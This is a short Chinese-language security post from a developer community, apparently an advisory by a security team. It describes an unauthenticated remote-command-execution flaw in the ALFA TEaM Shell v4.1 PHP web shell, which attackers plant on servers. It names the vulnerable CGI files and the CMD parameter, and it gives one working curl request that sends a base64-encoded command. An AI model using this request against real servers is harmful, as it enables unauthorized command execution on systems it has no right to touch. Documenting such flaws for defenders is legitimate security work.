前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >反制恶意软件ALFA TEAM SHELL TESLA 之 RCE

反制恶意软件ALFA TEAM SHELL TESLA 之 RCE

原创
作者头像
Khan安全团队
发布2021-12-22 14:42:01
7650
发布2021-12-22 14:42:01
举报
文章被收录于专栏:Khan安全团队Khan安全团队
ALFA TEaM Shell ~ v4.1
ALFA TEaM Shell ~ v4.1

一个发布新版本 PHP web shell 的组织是ALFA TEaM,这是一个可疑的伊朗组织,该组织创建了ALFA TEaMShell等网络恶意软件,过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣,FireEye 已经记录了APT 33组战术详细分析

供应​​商主页:http://solevisible.com

软件链接:https://phpshells.com/alfa-tesla-v4-1-shell

版本:v4.1

测试:Windows 10 Enterprise x64,Linux

[关于-阿尔法团队壳牌特斯拉]:

它是黑客使用的最流行的 web shell 之一,他们用它来访问服务器端。

[易受攻击的文件]:

1 . perl.alfa

2 . bash.alfa

3 . py.alfa

[易受攻击的参数]:CMD

[描述]: #执行命令无需身份验证或登录web shell, To use,只找到一个易受攻击的文件,

Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档